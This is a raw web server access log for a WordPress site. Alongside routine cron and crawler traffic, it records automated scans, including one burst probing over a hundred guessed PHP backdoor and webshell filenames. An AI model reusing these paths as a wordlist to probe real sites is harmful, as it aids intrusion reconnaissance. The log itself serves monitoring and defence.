File: /home/logs/cqqizhou_access_2025-10-23.log
36.133.115.36 - - [23/Oct/2025:00:00:33 +0800] "POST /wp-cron.php?doing_wp_cron=1761148833.5494749546051025390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.82.209 - - [23/Oct/2025:00:00:33 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.216.149.123 - - [23/Oct/2025:00:01:36 +0800] "GET /phpinfo.php HTTP/1.1" 404 27 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [23/Oct/2025:00:01:48 +0800] "POST /wp-cron.php?doing_wp_cron=1761148908.7602190971374511718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
107.170.14.218 - - [23/Oct/2025:00:01:48 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
107.170.14.218 - - [23/Oct/2025:00:01:49 +0800] "GET / HTTP/1.1" 200 33932 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
107.170.14.218 - - [23/Oct/2025:00:01:51 +0800] "GET /form.html HTTP/1.1" 404 8987 "-" "curl/8.1.2"
107.170.14.218 - - [23/Oct/2025:00:01:52 +0800] "GET /upl.php HTTP/1.1" 404 47 "-" "Mozilla/5.0"
107.170.14.218 - - [23/Oct/2025:00:01:54 +0800] "GET /t4 HTTP/1.1" 404 8990 "-" "Mozilla/5.0"
107.170.14.218 - - [23/Oct/2025:00:01:55 +0800] "GET /geoip/ HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
107.170.14.218 - - [23/Oct/2025:00:01:56 +0800] "GET /1.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
107.170.14.218 - - [23/Oct/2025:00:01:56 +0800] "GET /systembc/password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
107.170.14.218 - - [23/Oct/2025:00:01:57 +0800] "GET /password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:00:13:12 +0800] "POST /wp-cron.php?doing_wp_cron=1761149592.3874380588531494140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.133.91.48 - - [23/Oct/2025:00:13:12 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000 HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Oct/2025:00:16:57 +0800] "POST /wp-cron.php?doing_wp_cron=1761149817.3929970264434814453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.65.192.67 - - [23/Oct/2025:00:16:57 +0800] "GET /druid/index.html HTTP/1.1" 404 8989 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [23/Oct/2025:00:46:13 +0800] "POST /wp-cron.php?doing_wp_cron=1761151573.0230770111083984375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [23/Oct/2025:00:46:13 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
180.153.236.26 - - [23/Oct/2025:00:54:09 +0800] "GET / HTTP/1.1" 200 33932 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [23/Oct/2025:01:21:13 +0800] "POST /wp-cron.php?doing_wp_cron=1761153673.1129438877105712890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.94 - - [23/Oct/2025:01:21:14 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [23/Oct/2025:01:32:41 +0800] "POST /wp-cron.php?doing_wp_cron=1761154360.9875149726867675781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
85.208.96.199 - - [23/Oct/2025:01:32:41 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.199 - - [23/Oct/2025:01:32:41 +0800] "GET /2163/ HTTP/1.1" 200 24082 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
4.217.238.149 - - [23/Oct/2025:01:37:56 +0800] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:57 +0800] "GET /error.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:57 +0800] "GET /1.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:57 +0800] "GET /2.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:57 +0800] "GET /gmo.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:57 +0800] "GET /gm.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:57 +0800] "GET /hk.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:57 +0800] "GET /akcc.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:57 +0800] "GET /info.php HTTP/1.1" 200 29 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:58 +0800] "GET /class20.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:58 +0800] "GET /.well-known/acme-challenge/about.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:58 +0800] "GET /222.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:58 +0800] "GET /file21.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:58 +0800] "GET /opop.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:58 +0800] "GET /gelay.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:58 +0800] "GET /011i.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:59 +0800] "GET /snus.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:59 +0800] "GET /pn.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:59 +0800] "GET /f6.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:59 +0800] "GET /nfmr.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:59 +0800] "GET /wfile.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:37:59 +0800] "GET /gof.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:00 +0800] "GET /jsp.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:00 +0800] "GET /alam.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:00 +0800] "GET /3.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:00 +0800] "GET /a.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:00 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:00 +0800] "GET /about3.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:00 +0800] "GET /file18.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:00 +0800] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:01 +0800] "GET /ut.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:01 +0800] "GET /031.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:01 +0800] "GET /520.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:01 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:01 +0800] "GET /w.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:01 +0800] "GET /ee.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:01 +0800] "GET /an.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:02 +0800] "GET /wp.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:02 +0800] "GET /makeasmtp.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:02 +0800] "GET /system_log.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:02 +0800] "GET /NewFile.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:02 +0800] "GET /r.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:02 +0800] "GET /v4.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:02 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:02 +0800] "GET /build.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:03 +0800] "GET /inde.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:03 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:03 +0800] "GET /ffile.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:03 +0800] "GET /0x0x.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:03 +0800] "GET /sec.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:03 +0800] "GET /ssss.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:03 +0800] "GET /anskrit.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:03 +0800] "GET /thh.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:04 +0800] "GET /he.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:04 +0800] "GET /ddgg.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:04 +0800] "GET /aves.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:04 +0800] "GET /pp.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:04 +0800] "GET /geck.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:04 +0800] "GET /plss3.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:04 +0800] "GET /ton.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:05 +0800] "GET /ahax.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:05 +0800] "GET /ar.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:05 +0800] "GET /xx.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:05 +0800] "GET /wp-gr.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:05 +0800] "GET /yellow.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:05 +0800] "GET /a1.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:05 +0800] "GET /zwso.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:06 +0800] "GET /alfa.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:06 +0800] "GET /epinyins.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:06 +0800] "GET /x.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:06 +0800] "GET /lv.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:06 +0800] "GET /fffff.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:06 +0800] "GET /file1.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:06 +0800] "GET /keu.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:07 +0800] "GET /file88.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:07 +0800] "GET /cccc.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:07 +0800] "GET /hexx.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:07 +0800] "GET /a2.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:07 +0800] "GET /cfile.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:07 +0800] "GET /jmfi2.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:07 +0800] "GET /file7.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:07 +0800] "GET /file4.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:08 +0800] "GET /manager.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:08 +0800] "GET /abcd.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:08 +0800] "GET /efile.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:08 +0800] "GET /file18.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:08 +0800] "GET /filesss.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:08 +0800] "GET /tox.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:08 +0800] "GET /2clas.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:08 +0800] "GET /vee.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:09 +0800] "GET /ff2.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:09 +0800] "GET /rrr.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:09 +0800] "GET /alpa.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:09 +0800] "GET /aa21.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:09 +0800] "GET /default.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:09 +0800] "GET /fileas.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:09 +0800] "GET /t.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:09 +0800] "GET /c.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:09 +0800] "GET /wpc.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:10 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:10 +0800] "GET /usep.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:10 +0800] "GET /cool.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:10 +0800] "GET /lol.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:10 +0800] "GET /radio.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:10 +0800] "GET /ilex.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:11 +0800] "GET /klex.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:11 +0800] "GET /blex.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:11 +0800] "GET /mlex.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:11 +0800] "GET /nfile.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:11 +0800] "GET /class19.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:11 +0800] "GET /resp.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:11 +0800] "GET /vanta.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:11 +0800] "GET /fass.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:12 +0800] "GET /huangs.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:12 +0800] "GET /anan.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:12 +0800] "GET /classgoto24.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:12 +0800] "GET /hook.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:12 +0800] "GET /simp.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:12 +0800] "GET /ckk.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:12 +0800] "GET /tiny.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:12 +0800] "GET /wa.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:13 +0800] "GET /wb.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:13 +0800] "GET /wc.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:13 +0800] "GET /wd.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:13 +0800] "GET /we.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:13 +0800] "GET /wf.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:13 +0800] "GET /wg.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:13 +0800] "GET /wh.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:13 +0800] "GET /wi.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:14 +0800] "GET /wj.php HTTP/1.1" 404 27 "-" "-"
4.217.238.149 - - [23/Oct/2025:01:38:14 +0800] "GET /wk.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [23/Oct/2025:01:44:57 +0800] "POST /wp-cron.php?doing_wp_cron=1761155097.2910549640655517578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [23/Oct/2025:01:44:57 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
85.208.96.205 - - [23/Oct/2025:01:46:57 +0800] "GET /logistics/ HTTP/1.1" 200 22415 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [23/Oct/2025:01:57:44 +0800] "POST /wp-cron.php?doing_wp_cron=1761155864.7088980674743652343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.168.127.100 - - [23/Oct/2025:01:57:44 +0800] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:01:57:45 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:01:57:45 +0800] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:01:57:46 +0800] "POST /wp-cron.php?doing_wp_cron=1761155866.7562839984893798828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.168.127.100 - - [23/Oct/2025:01:57:46 +0800] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:01:57:47 +0800] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:01:57:48 +0800] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:01:57:49 +0800] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:01:57:50 +0800] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:01:57:50 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/new" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:01:57:51 +0800] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:01:57:52 +0800] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.168.127.100 - - [23/Oct/2025:01:57:52 +0800] "HEAD / HTTP/1.1" 200 0 "http://cqqizhou.com/home" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:02:01:22 +0800] "POST /wp-cron.php?doing_wp_cron=1761156081.9792160987854003906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.76.44.148 - - [23/Oct/2025:02:01:22 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
36.133.115.36 - - [23/Oct/2025:02:16:09 +0800] "POST /wp-cron.php?doing_wp_cron=1761156969.4922540187835693359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.167.144.238 - - [23/Oct/2025:02:16:09 +0800] "GET /2159/ HTTP/1.1" 200 29003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:02:56:13 +0800] "POST /wp-cron.php?doing_wp_cron=1761159372.9702129364013671875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
71.6.199.87 - - [23/Oct/2025:02:56:13 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [23/Oct/2025:03:08:09 +0800] "POST /wp-cron.php?doing_wp_cron=1761160089.3224020004272460937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
40.69.138.28 - - [23/Oct/2025:03:08:09 +0800] "GET /.well-known/acme-challenge/ HTTP/1.1" 404 31381 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:10 +0800] "GET /abcd.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:10 +0800] "GET /about.php?p= HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:11 +0800] "GET /chosen.php?p= HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:11 +0800] "GET /default.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:12 +0800] "GET /ds.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:12 +0800] "GET /f5.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:13 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:13 +0800] "GET /god4m.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:14 +0800] "GET /info.php HTTP/1.1" 200 29 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:15 +0800] "GET /modules/ HTTP/1.1" 404 31381 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:16 +0800] "GET /test1.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:17 +0800] "GET /uploads/ HTTP/1.1" 404 31381 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:18 +0800] "GET /wp-admin/images/ HTTP/1.1" 403 146 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:18 +0800] "GET /wp-content/uploads/ HTTP/1.1" 403 146 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:19 +0800] "GET /wp-good.php HTTP/1.1" 404 27 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:19 +0800] "GET /wp-includes/ID3/ HTTP/1.1" 403 146 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:20 +0800] "GET /wp-includes/Text/ HTTP/1.1" 403 146 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:20 +0800] "GET /wp-includes/assets/ HTTP/1.1" 403 146 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:21 +0800] "GET /wp-includes/js/codemirror/ HTTP/1.1" 403 146 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:21 +0800] "GET /wp-includes/js/crop/ HTTP/1.1" 403 146 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:22 +0800] "GET /wp-includes/pomo/ HTTP/1.1" 403 146 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:22 +0800] "GET /wp-includes/rest-api/fields/ HTTP/1.1" 403 146 "-" "-"
40.69.138.28 - - [23/Oct/2025:03:08:23 +0800] "GET /.__info.php HTTP/1.1" 404 27 "-" "-"
